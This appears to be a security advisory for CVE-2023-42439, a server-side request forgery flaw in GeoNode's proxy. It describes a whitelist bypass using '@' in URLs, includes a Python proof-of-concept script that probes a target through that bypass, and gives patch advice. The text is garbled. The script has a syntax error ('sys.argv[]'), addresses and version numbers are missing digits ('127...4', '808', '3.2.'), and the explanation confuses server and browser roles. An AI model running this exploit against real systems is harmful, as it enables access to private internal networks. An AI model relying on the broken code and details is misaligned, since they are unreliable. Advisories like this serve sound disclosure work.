CVE-2023-42439 - SSRF Vulnerability in GeoNode Versions 3.2. - 4.1.3 Pre-exploit

GeoNode is an open-source platform used for creating, sharing, and working collaboratively with geospatial data. However, a Server-Side Request Forgery (SSRF) vulnerability has been detected in versions 3.2. through 4.1.3.pre. This vulnerability enables an attacker to bypass existing controls and perform unauthorized requests to internal services, thereby gaining access to sensitive data from the internal network. The first patched version, 4.1.3.post1, addresses this vulnerability.

Vulnerability Details

The application uses a whitelist to allow access, but attackers can bypass this whitelist using specially crafted URL requests. By doing so, the application gets tricked into believing that the first host in the request is a whitelisted address, while the browser interprets the @ or %40 as credentials for the specified host. The attacker specifies a host (e.g., geoserver) and port (e.g., 808), and the browser sends the sensitive data to that host in the response.

The following code snippet demonstrates this SSRF vulnerability

#CVE-2023-42439-PoC.py

import sys
import requests

if len(sys.argv) != 2:
    print(f'Usage: {sys.argv[]} <target>')
    exit(1)

target = sys.argv[1]
whitelisted_host = "127...4"
internal_service = "geoserver.example.com:808"

url = f"http://{target}/proxy?url=http://{whitelisted_host}%40{internal_service}/geoserver";

response = requests.get(url)

if response.status_code != 404:
    print("SSRF vulnerability exists!")
else:
    print("System not vulnerable.")

To exploit this vulnerability, run the PoC script with the target host as an argument

$ python3 CVE-2023-42439-PoC.py example.com

If the output shows "SSRF vulnerability exists!", the target system is vulnerable.

Original References

1. GeoNode - Official website
2. SSRFattack.com - Details about Server-Side Request Forgery attacks
3. GeoNode GitHub commit with fix

Patching and Mitigation

To address this vulnerability, users should upgrade to GeoNode version 4.1.3.post1 or later. Organizations are also encouraged to perform regular security audits, use best practices for secure coding, and minimize the attack surface by restricting access to internal services.

Conclusion

Organizations using GeoNode versions 3.2. through 4.1.3.pre should upgrade immediately to mitigate the risk posed by the SSRF vulnerability CVE-2023-42439. This vulnerability could enable attackers to bypass security controls and access sensitive data on internal networks. The first patched release, version 4.1.3.post1, is available for download on the official GeoNode website.

Timeline

Published on: 09/15/2023 21:15:11 UTC
Last modified on: 11/04/2023 02:00:21 UTC